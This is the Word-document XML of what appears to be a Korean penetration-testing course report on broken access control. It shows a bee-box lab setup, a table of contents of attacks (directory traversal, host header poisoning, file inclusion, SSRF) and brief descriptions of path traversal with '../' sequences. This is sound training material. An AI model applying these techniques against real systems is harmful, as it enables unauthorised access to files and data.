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:rsidRPr="0035631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35631E" w:rsidRDefault="00DE047E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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35631E" w:rsidRDefault="00DE047E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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35631E" w:rsidRDefault="00DE047E" w:rsidP="00DE047E">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>K</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ITRI </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">모의해킹 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00810D7F" w:rsidRPr="0035631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435F8A" w:rsidRPr="0035631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35631E" w:rsidRDefault="00435F8A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35631E" w:rsidRDefault="00435F8A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09C3BA53" w:rsidR="00435F8A" w:rsidRPr="0035631E" w:rsidRDefault="00435F8A" w:rsidP="00435F8A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  <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>작성:</w:t>
            </w:r>
            <w:r w:rsidR="00B309AF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>고준혁</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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35631E" w:rsidRDefault="00435F8A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435F8A" w:rsidRPr="0035631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35631E" w:rsidRDefault="00435F8A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0ADCE7CA" w:rsidR="00435F8A" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D" w:rsidP="00435F8A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>roken Access control</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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35631E" w:rsidRDefault="00435F8A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0B79B5E5" w:rsidR="00810D7F" w:rsidRPr="0035631E" w:rsidRDefault="00B73BF3" w:rsidP="00435F8A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>취약한 접근 제어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35631E" w:rsidRDefault="00810D7F" w:rsidP="00810D7F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5743CD62" w:rsidR="00810D7F" w:rsidRPr="0035631E" w:rsidRDefault="00810D7F" w:rsidP="00B73BF3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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35631E" w:rsidRDefault="00810D7F" w:rsidP="00810D7F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DE047E" w:rsidRPr="0035631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35631E" w:rsidRDefault="00DE047E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35631E" w:rsidRDefault="00DE047E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35631E" w:rsidRDefault="00DE047E" w:rsidP="00810D7F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35631E" w:rsidRDefault="00810D7F" w:rsidP="00810D7F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35631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1B09F378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62B969F8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28644DCA" w14:textId="77777777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19E1A7E3" w14:textId="7E233990" w:rsidR="00810D7F" w:rsidRPr="0035631E" w:rsidRDefault="00810D7F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35631E" w:rsidRDefault="00810D7F" w:rsidP="00810D7F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</w:tbl>
    <w:p w14:paraId="4C621116" w14:textId="69366842" w:rsidR="00DE047E" w:rsidRPr="0035631E" w:rsidRDefault="00DE047E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674AA210" w14:textId="353823D8" w:rsidR="00DE047E" w:rsidRPr="0035631E" w:rsidRDefault="00DE047E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C3DBC0" w14:textId="05D23D21" w:rsidR="00DE047E" w:rsidRPr="0035631E" w:rsidRDefault="00DE047E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7FCF70" w14:textId="04D9152B" w:rsidR="00DE047E" w:rsidRPr="0035631E" w:rsidRDefault="00DE047E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170DD4EF" w14:textId="08AEA527" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0271DB" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688F1889" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRPr="0035631E" w:rsidRDefault="00DE047E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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:rsidRPr="0035631E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50B38C12" w:rsidR="001F0BA1" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D" w:rsidP="006F2E6D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>개요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w:rsidRPr="0035631E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26C1564D" w:rsidR="00BE7966" w:rsidRPr="0035631E" w:rsidRDefault="004C2E0B" w:rsidP="0050741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A</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E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취약한 접근 제어(</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>broken Access Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w:rsidRPr="0035631E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DAD7659" w14:textId="62D7A54A" w:rsidR="004C2E0B" w:rsidRPr="0035631E" w:rsidRDefault="004C2E0B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-취약한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접근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제어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는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인증된 사용자가 수행할 수 있는 것에 대한 제한이 제대로 적용되지 않는 것을 의미한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC95532" w14:textId="49D657F3" w:rsidR="00C91E68" w:rsidRPr="0035631E" w:rsidRDefault="004C2E0B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공격자는 이러한 취약점을 악용하여 사용자의 계정 액세스,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중요한 파일 보기,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사용자의 데이터 수정,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액세스 권한 변경 등과 같은 권한 없는 기능 또는 데이터에 액세스 할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C417E9B" w14:textId="172159C2" w:rsidR="00B73BF3" w:rsidRPr="0035631E" w:rsidRDefault="00B73BF3" w:rsidP="00C91E68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:b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D507E" w:rsidRPr="0035631E" w14:paraId="7B4A5C9F" w14:textId="77777777" w:rsidTr="009D507E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3486" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="8496B0" w:themeFill="text2" w:themeFillTint="99"/>
                </w:tcPr>
                <w:p w14:paraId="16ABB052" w14:textId="203B1F02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</w:rPr>
                    <w:t>실습 환경</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="171717" w:themeFill="background2" w:themeFillShade="1A"/>
                </w:tcPr>
                <w:p w14:paraId="53980A7C" w14:textId="33359C86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</w:rPr>
                    <w:t>O</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0035631E">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="171717" w:themeFill="background2" w:themeFillShade="1A"/>
                </w:tcPr>
                <w:p w14:paraId="0AD728F1" w14:textId="722751E6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</w:rPr>
                    <w:t>I</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0035631E">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="009D507E" w:rsidRPr="0035631E" w14:paraId="18F0E3C7" w14:textId="77777777" w:rsidTr="009D507E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3486" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="6ED02D01" w14:textId="4C5E3313" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E" w:rsidP="00711A95">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0035631E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자</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="435B7946" w14:textId="54DA3159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W</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0035631E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indows 7</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="27483A4A" w14:textId="51A40E2E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35631E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72.30.1.60</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="009D507E" w:rsidRPr="0035631E" w14:paraId="4F548356" w14:textId="77777777" w:rsidTr="009D507E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3486" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="6C5F1A4A" w14:textId="1DC0D54D" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E" w:rsidP="00711A95">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0035631E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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="17807049" w14:textId="09C3B59B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  <w:sz w:val="22"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>U</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0035631E">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="22"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>buntu(Bee-box)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3487" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="35606D79" w14:textId="341AAB7D" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E" w:rsidP="009D507E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35631E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35631E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72.30.1.10</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="73060360" w14:textId="3BD48257" w:rsidR="009D507E" w:rsidRDefault="009D507E" w:rsidP="00C91E68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:lang w:val="ko-KR"/>
              </w:rPr>
              <w:id w:val="1385602045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sdtEndPr>
            <w:sdtContent>
              <w:p w14:paraId="7530B611" w14:textId="17566DAF" w:rsidR="004D06EF" w:rsidRDefault="004D06EF" w:rsidP="004D06EF">
                <w:pPr>
                  <w:pStyle w:val="TOC"/>
                  <w:rPr>
                    <w:lang w:val="ko-KR"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:lang w:val="ko-KR"/>
                  </w:rPr>
                  <w:t>목차</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="69BAA0DF" w14:textId="77777777" w:rsidR="004D06EF" w:rsidRPr="004D06EF" w:rsidRDefault="004D06EF" w:rsidP="004D06EF">
                <w:pPr>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                    <w:lang w:val="ko-KR"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="26790E8E" w14:textId="77777777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 w:rsidRPr="004D06EF">
                  <w:t>directory Traversal – Directories</w:t>
                </w:r>
                <w:r w:rsidRPr="004D06EF">
                  <w:t xml:space="preserve"> </w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="77AD3BB0" w14:textId="77777777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>
                  <w:t>d</w:t>
                </w:r>
                <w:r w:rsidRPr="004D06EF">
                  <w:t>irectory Traversal – Files</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="03BD57E9" w14:textId="77777777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 w:rsidRPr="004D06EF">
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                  <w:t>H</w:t>
                </w:r>
                <w:r w:rsidRPr="004D06EF">
                  <w:t>ost Header Attack(Cache Poisoning)</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="302BDB1F" w14:textId="6A205859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 w:rsidRPr="004D06EF">
                  <w:t>Local File Inclusion(SQLiteManager)</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="21864B91" w14:textId="4DE7FAFD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 w:rsidRPr="004D06EF">
                  <w:t>Remote &amp; Local File Inclusion (RFI/LFI)</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="03BD948C" w14:textId="614AB0D6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 w:rsidRPr="004D06EF">
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                  <w:t>R</w:t>
                </w:r>
                <w:r w:rsidRPr="004D06EF">
                  <w:t>estrict Device Access</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="45953DF4" w14:textId="585F2DA0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</w:pPr>
                <w:r w:rsidRPr="004D06EF">
                  <w:t>Restrict Folder Access</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="62990D85" w14:textId="52E82F7E" w:rsidR="004D06EF" w:rsidRPr="004D06EF" w:rsidRDefault="004D06EF" w:rsidP="004D06EF">
                <w:pPr>
                  <w:pStyle w:val="10"/>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="29"/>
                  </w:numPr>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="004D06EF">
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                  <w:t>S</w:t>
                </w:r>
                <w:r w:rsidRPr="004D06EF">
                  <w:t>erver Side Request Forgery(SSRF)</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="5640ECB5" w14:textId="77777777" w:rsidR="00A46195" w:rsidRDefault="00A46195" w:rsidP="00C91E68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="A_2"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="51540E94" w14:textId="01BE876A" w:rsidR="00483DC7" w:rsidRPr="00A46195" w:rsidRDefault="00A46195" w:rsidP="00C91E68">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00A46195"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  <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00A46195">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">## </w:t>
            </w:r>
            <w:r w:rsidRPr="00A46195"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  <w:t xml:space="preserve">항목별로 </w:t>
            </w:r>
            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="1"/>
            <w:r w:rsidRPr="00A46195"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  <w:t>링크 걸</w:t>
            </w:r>
            <w:r w:rsidR="00196A76"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  <w:t>었습니다</w:t>
            </w:r>
            <w:r w:rsidRPr="00A46195"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46195">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Ctrl + </w:t>
            </w:r>
            <w:r w:rsidRPr="00A46195">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">클릭 시 이동 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A46195">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>###</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="247DC6C1" w14:textId="77777777" w:rsidR="00A46195" w:rsidRDefault="00A46195" w:rsidP="00C91E68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="44"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5857B2E6" w14:textId="13C5C0AF" w:rsidR="00C91E68" w:rsidRPr="0035631E" w:rsidRDefault="009F0A19" w:rsidP="00C91E68">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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A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735CB9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4"/>
              </w:rPr>
              <w:t>1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 xml:space="preserve">. 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dir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e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c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t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o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ry Traversal –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 xml:space="preserve"> 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D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ir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e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c</w:t>
            </w:r>
            <w:r w:rsidR="00C91E68" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>tories</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D6431A5" w14:textId="67BA2B34" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="009F0A19" w:rsidP="00BF7530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  <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00C91E68" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Directory Traversal</w:t>
            </w:r>
            <w:r w:rsidR="00C91E68" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve"> : </w:t>
            </w:r>
            <w:r w:rsidR="00C91E68" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>경로 탐색 취약점</w:t>
            </w:r>
            <w:r w:rsidR="00C91E68" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>. 취약한 파라미터에 "../" 이나 "..\" 등의 기호를 이용하여 관리자가 의도하지 않은 디렉터리까지 접근할 수 있는 공격이다.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="2" w:name="B_1"/>
          <w:bookmarkEnd w:id="2"/>
          <w:p w14:paraId="77D15337" w14:textId="391FBC5A" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00F630CF" w:rsidP="00735CB9">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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B_2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2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. Director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y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 xml:space="preserve"> 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T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r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av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e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rs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a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</w:rPr>
              <w:t>l – Files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C7234F" w14:textId="495237AA" w:rsidR="00B73BF3" w:rsidRPr="0035631E" w:rsidRDefault="00F630CF" w:rsidP="00735CB9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  <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E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="00735CB9" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>웹 브라우저를 통해서 확인 가능한 상위 디렉터리를 검색하여 시스템 파일을 검색/접근하거나 다운로드하는 취약점이다.</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="3" w:name="C1"/>
          <w:bookmarkEnd w:id="3"/>
          <w:p w14:paraId="312DA215" w14:textId="4A30A1DC" w:rsidR="00B73BF3" w:rsidRPr="0035631E" w:rsidRDefault="008A7C7B" w:rsidP="00735CB9">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="a8"/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instrText xml:space="preserve"> HYPERLINK  \l "C2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fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B73BF3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72"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3"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="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>H</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
              </w:rPr>
              <w:t>ost Header Attack(Cache P</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="00B73BF3" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
              </w:rPr>
              <w:t>isoning)</w:t>
            </w:r>
